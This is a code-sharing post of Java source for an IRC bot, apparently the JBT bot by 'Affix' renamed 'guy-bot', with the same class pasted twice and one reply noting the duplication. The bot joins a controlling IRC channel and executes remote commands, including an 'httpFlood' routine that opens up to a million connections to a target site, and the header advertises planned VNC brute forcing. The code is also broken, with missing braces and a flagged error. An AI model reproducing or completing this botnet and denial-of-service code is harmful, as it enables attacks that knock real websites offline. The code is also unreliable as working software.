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irc bot - Java Code Bank

irc bot
i named him guy
 * @ App Name : guy-bot
 * @ Version : 1.2.0
 * @ Author : mr-hacks
 * @ Description :
 *   guy-bot is an open source IRCBot Written by mr-hacks
 *   this bot will be updated by  frequently.
 * @ Changelog
 *   [+] V1.0.0-1.2.0
 *     [-] Added HTTP Flooder
 *     [-] Added Visit Functions
 * @ App Name : JBT
 * @ Version : 1.2.0
 * @ Author : Affix
 * @ Contact : affix@ihack.co.uk
 * @ Website : http://ihack.co.uk
 * @ Description :
 *   JBT is an open source IRCBot Written by Affix
 *   this bot will be updated by Affix frequently.
 * @ Changelog
 *   [+] V1.0.0-1.2.0
 *     [-] Added HTTP Flooder
 *     [-] Added Visit Functions
 * @ Coming Soon :
 *     [+] VNC Brute forcing
 *     [+] Download Functions
 *     [+] AUTH SYSTEM

import java.io.*;
import java.util.*;
import java.net.*;
import java.text.*;
import javax.net.*;

public class JBT {
   static String os = System.getProperty("os.name");
   private static String host = "SERVER";
   private static final int PORT = 6667;
   private static String nick = "JAVA|" + new Random().nextInt(1000) + 1;
   private static String pass = "joE-32";
   private static String chan = "#java";
   private static String chankey = "1234";
   private static String prefix = "!";
   private static String ver = "1.2.0";
   private static String target;
   private static String local;
    public static String ipAddrStr = "";
   public static void main(String[] args) {           
   public static void run() {
      Socket link = null;
      try {
         Scanner inputFromMe = new Scanner(System.in);
         link = new Socket(host, PORT);
           sendRawLine("PASS pass", link);
          sendRawLine("USER "+nick+" 8 * "+nick, link);
          sendRawLine("NICK "+nick, link);
          sendRawLine("JOIN "+chan+" "+chankey, link);
          BufferedReader in = new BufferedReader(new InputStreamReader(link.getInputStream()));
          while(true) {
          try {
              SimpleDateFormat date = new SimpleDateFormat("(hh:mm:ss)");
              String output = date.format(new Date());
              String hai = in.readLine();
              if (!hai.startsWith(":")) {
                 System.out.println(output+" "+hai);
              if (hai.startsWith(":")) {
                 String text = getText(hai);
                 System.out.println(output+" ("+getSender(hai)+") "+text);
                 if (text.startsWith(prefix + "")) {
                    command(text, getSender(hai), link, getChannel(hai));
              } catch (IOException e) {
             // No action
      catch(IOException e) { e.printStackTrace(); }
      finally {
         try {
         } catch(IOException ex) {
            System.err.println("Failed to close Socket!");

   public static void sendNotice(String text, String person, Socket link) {
      sendRawLine("NOTICE "+person+" :"+text, link);
   public static void command(String command, String sender, Socket link, String channel) {
      Socket net = null;
     if (command.startsWith(prefix + "send")) {
         sendMessage(command.substring(6), link);
      if (command.startsWith(prefix + "csend")) {
         int x = command.indexOf(" ");
         int y = command.indexOf(" ", x+1);
         String chan = command.substring(x+1,y);
         String message = command.substring(y+1);
         sendMessage(chan, message, link);
      if (command.startsWith(prefix + "join")) {
         sendRawLine("JOIN :"+command.substring(6), link);
      if (command.startsWith(prefix + "part")) {
         sendRawLine("PART :"+command.substring(6), link);
      if (command.startsWith(prefix + "notice")) {
         int x = -1;
         int y = -1;
         x= command.indexOf(" ");
         y= command.indexOf(" ", x+1);
         if (x != -1 && y != -1)
         sendNotice(command.substring(y+1), command.substring(x+1, y), link);
      if (command.startsWith(prefix + "ping")) {
         sendRawLine("PING :"+command.substring(6), link);
      if (command.startsWith(prefix + "version")) {
         sendRawLine("PRIVMSG " + chan + " : JBT Verison " + ver + " Written By Affix @ ihack.co.uk", link);
      if (command.startsWith(prefix + "reverse")) {
         StringBuffer buffed = new StringBuffer(command.substring(8)).reverse();
         String ra = buffed.toString();
         sendRawLine("PRIVMSG " + chan + ":"+ra, link);
      if (command.startsWith(prefix + "rawSender")) {
         sendRawLine(command.substring(11), link);
      // ERROR HERE
      if (command.startsWith(prefix + "httpFlood")) {
         //HTTP Flood a Site
         target = command.substring(6);
         for(int i=1; i<1000000; i++){ //HTTP FLOOD CODE HERE
              try {
               net = new Socket(target, 80);
               sendRawLine("GET / HTTP/1.1", net);
               sendRawLine("Host: " + target, net);
            sendRawLine("Connection: close", net);
                 catch(UnknownHostException e)
                    //NO ACTION
                 catch(IOException e)
                    //NO ACTION
         sendRawLine("PRIVMSG " + chan + " : Flooding Completed to " + target, link);
      if (command.startsWith(prefix + "test")) {
         int x = command.indexOf(" ");
         int y = command.indexOf(" ", x+1);
         String type = command.substring(x+1, y);
         String msg = command.substring(y+1);
         int type2 = Integer.parseInt(type);
         if(x > 0 && y > 0) {
            sendMessage(type2+msg, link);
      if (command.startsWith(prefix + "visit")) {
         target = command.substring(6);
             try {
               net = new Socket(target, 80);
               sendRawLine("GET / HTTP/1.1", net);
               sendRawLine("Host: " + target, net);
               sendRawLine("Connection: close", net);
                 catch(UnknownHostException e)
                    //NO ACTION
                 catch(IOException e)
                    //NO ACTION
         sendRawLine("PRIVMSG " + chan + " : Visited Link : " + target, link);
      if (command.equalsIgnoreCase(prefix + "commands")) {
         sendNotice(prefix + "notice name message", sender, link);
         sendNotice(prefix + "send message", sender, link);
         sendNotice(prefix + "reverse message", sender, link);
         //sendNotice("", sender, link);
      if (command.equalsIgnoreCase(prefix + "shutdown")) {
            sendRawLine("QUIT :BAI", link);
      if (command.startsWith(prefix + "setName")) {
            sendRawLine("NICK "+command.substring(9), link);
   public static String getChannel(String rawtext) {
       String text = rawtext;
      int space1 = rawtext.indexOf(" ");
      int space2 = -1;
      space2 = rawtext.indexOf(" ", space1+1);
      int space3 = -1;
      space3 = rawtext.indexOf(" ", space2+1);
      if (space2 != -1 && space3 != -1) {
         text = rawtext.substring(space2+1, space3);
      if (space2 == -1 && space3 == -1) {
         text = rawtext;
      return text;     
   public static void sendMessage(String text, Socket link) {
      sendRawLine("PRIVMSG " + chan + " :"+text, link);
   public static void sendMessage(String channel, String text, Socket link) {
      sendRawLine("PRIVMSG " + chan + " :"+text, link);
   public static String getText(String rawtext) {
      String text = rawtext;
      int space1 = rawtext.indexOf(":");
      int space2 = -1;
      space2 = rawtext.indexOf(":", space1+1);
      if (space2 != -1) {
         text = rawtext.substring(space2+1);
      if (space2 == -1) {
         text = rawtext;
      return text;
   public static String getSender(String rawtext) {
      String text = rawtext;
      int colon1 = rawtext.indexOf(":");
      int exclamation1 = -1;
      exclamation1 = rawtext.indexOf(prefix + "", colon1+1);
      if (exclamation1 != -1) {
         text = rawtext.substring(colon1+1, exclamation1);
      else if (exclamation1 == -1) {
         text = rawtext;
      return text;
   public static void sendRawLine(String text, Socket sock) {
      try {
         BufferedWriter out = new BufferedWriter(new OutputStreamWriter(sock.getOutputStream()));
      } catch(IOException ex) {

import java.io.*;
import java.util.*;
import java.net.*;
import java.text.*;
import javax.net.*;

public class JBT {
   static String os = System.getProperty("os.name");
   private static String host = "SERVER";
   private static final int PORT = 6667;
   private static String nick = "JAVA|" + new Random().nextInt(1000) + 1;
   private static String pass = "joE-32";
   private static String chan = "#java";
   private static String chankey = "1234";
   private static String prefix = "!";
   private static String ver = "1.2.0";
   private static String target;
   private static String local;
    public static String ipAddrStr = "";
   public static void main(String[] args) {           
   public static void run() {
      Socket link = null;
      try {
         Scanner inputFromMe = new Scanner(System.in);
         link = new Socket(host, PORT);
           sendRawLine("PASS pass", link);
          sendRawLine("USER "+nick+" 8 * "+nick, link);
          sendRawLine("NICK "+nick, link);
          sendRawLine("JOIN "+chan+" "+chankey, link);
          BufferedReader in = new BufferedReader(new InputStreamReader(link.getInputStream()));
          while(true) {
          try {
              SimpleDateFormat date = new SimpleDateFormat("(hh:mm:ss)");
              String output = date.format(new Date());
              String hai = in.readLine();
              if (!hai.startsWith(":")) {
                 System.out.println(output+" "+hai);
              if (hai.startsWith(":")) {
                 String text = getText(hai);
                 System.out.println(output+" ("+getSender(hai)+") "+text);
                 if (text.startsWith(prefix + "")) {
                    command(text, getSender(hai), link, getChannel(hai));
              } catch (IOException e) {
             // No action
      catch(IOException e) { e.printStackTrace(); }
      finally {
         try {
         } catch(IOException ex) {
            System.err.println("Failed to close Socket!");

   public static void sendNotice(String text, String person, Socket link) {
      sendRawLine("NOTICE "+person+" :"+text, link);
   public static void command(String command, String sender, Socket link, String channel) {
      Socket net = null;
     if (command.startsWith(prefix + "send")) {
         sendMessage(command.substring(6), link);
      if (command.startsWith(prefix + "csend")) {
         int x = command.indexOf(" ");
         int y = command.indexOf(" ", x+1);
         String chan = command.substring(x+1,y);
         String message = command.substring(y+1);
         sendMessage(chan, message, link);
      if (command.startsWith(prefix + "join")) {
         sendRawLine("JOIN :"+command.substring(6), link);
      if (command.startsWith(prefix + "part")) {
         sendRawLine("PART :"+command.substring(6), link);
      if (command.startsWith(prefix + "notice")) {
         int x = -1;
         int y = -1;
         x= command.indexOf(" ");
         y= command.indexOf(" ", x+1);
         if (x != -1 && y != -1)
         sendNotice(command.substring(y+1), command.substring(x+1, y), link);
      if (command.startsWith(prefix + "ping")) {
         sendRawLine("PING :"+command.substring(6), link);
      if (command.startsWith(prefix + "version")) {
         sendRawLine("PRIVMSG " + chan + " : JBT Verison " + ver + " Written By Affix @ ihack.co.uk", link);
      if (command.startsWith(prefix + "reverse")) {
         StringBuffer buffed = new StringBuffer(command.substring(8)).reverse();
         String ra = buffed.toString();
         sendRawLine("PRIVMSG " + chan + ":"+ra, link);
      if (command.startsWith(prefix + "rawSender")) {
         sendRawLine(command.substring(11), link);
      // ERROR HERE
      if (command.startsWith(prefix + "httpFlood")) {
         //HTTP Flood a Site
         target = command.substring(6);
         for(int i=1; i<1000000; i++){ //HTTP FLOOD CODE HERE
              try {
               net = new Socket(target, 80);
               sendRawLine("GET / HTTP/1.1", net);
               sendRawLine("Host: " + target, net);
            sendRawLine("Connection: close", net);
                 catch(UnknownHostException e)
                    //NO ACTION
                 catch(IOException e)
                    //NO ACTION
         sendRawLine("PRIVMSG " + chan + " : Flooding Completed to " + target, link);
      if (command.startsWith(prefix + "test")) {
         int x = command.indexOf(" ");
         int y = command.indexOf(" ", x+1);
         String type = command.substring(x+1, y);
         String msg = command.substring(y+1);
         int type2 = Integer.parseInt(type);
         if(x > 0 && y > 0) {
            sendMessage(type2+msg, link);
      if (command.startsWith(prefix + "visit")) {
         target = command.substring(6);
             try {
               net = new Socket(target, 80);
               sendRawLine("GET / HTTP/1.1", net);
               sendRawLine("Host: " + target, net);
               sendRawLine("Connection: close", net);
                 catch(UnknownHostException e)
                    //NO ACTION
                 catch(IOException e)
                    //NO ACTION
         sendRawLine("PRIVMSG " + chan + " : Visited Link : " + target, link);
      if (command.equalsIgnoreCase(prefix + "commands")) {
         sendNotice(prefix + "notice name message", sender, link);
         sendNotice(prefix + "send message", sender, link);
         sendNotice(prefix + "reverse message", sender, link);
         //sendNotice("", sender, link);
      if (command.equalsIgnoreCase(prefix + "shutdown")) {
            sendRawLine("QUIT :BAI", link);
      if (command.startsWith(prefix + "setName")) {
            sendRawLine("NICK "+command.substring(9), link);
   public static String getChannel(String rawtext) {
       String text = rawtext;
      int space1 = rawtext.indexOf(" ");
      int space2 = -1;
      space2 = rawtext.indexOf(" ", space1+1);
      int space3 = -1;
      space3 = rawtext.indexOf(" ", space2+1);
      if (space2 != -1 && space3 != -1) {
         text = rawtext.substring(space2+1, space3);
      if (space2 == -1 && space3 == -1) {
         text = rawtext;
      return text;     
   public static void sendMessage(String text, Socket link) {
      sendRawLine("PRIVMSG " + chan + " :"+text, link);
   public static void sendMessage(String channel, String text, Socket link) {
      sendRawLine("PRIVMSG " + chan + " :"+text, link);
   public static String getText(String rawtext) {
      String text = rawtext;
      int space1 = rawtext.indexOf(":");
      int space2 = -1;
      space2 = rawtext.indexOf(":", space1+1);
      if (space2 != -1) {
         text = rawtext.substring(space2+1);
      if (space2 == -1) {
         text = rawtext;
      return text;
   public static String getSender(String rawtext) {
      String text = rawtext;
      int colon1 = rawtext.indexOf(":");
      int exclamation1 = -1;
      exclamation1 = rawtext.indexOf(prefix + "", colon1+1);
      if (exclamation1 != -1) {
         text = rawtext.substring(colon1+1, exclamation1);
      else if (exclamation1 == -1) {
         text = rawtext;
      return text;
   public static void sendRawLine(String text, Socket sock) {
      try {
         BufferedWriter out = new BufferedWriter(new OutputStreamWriter(sock.getOutputStream()));
      } catch(IOException ex) {
ghost's avatar
ghost 14 years ago

you put the same class twice…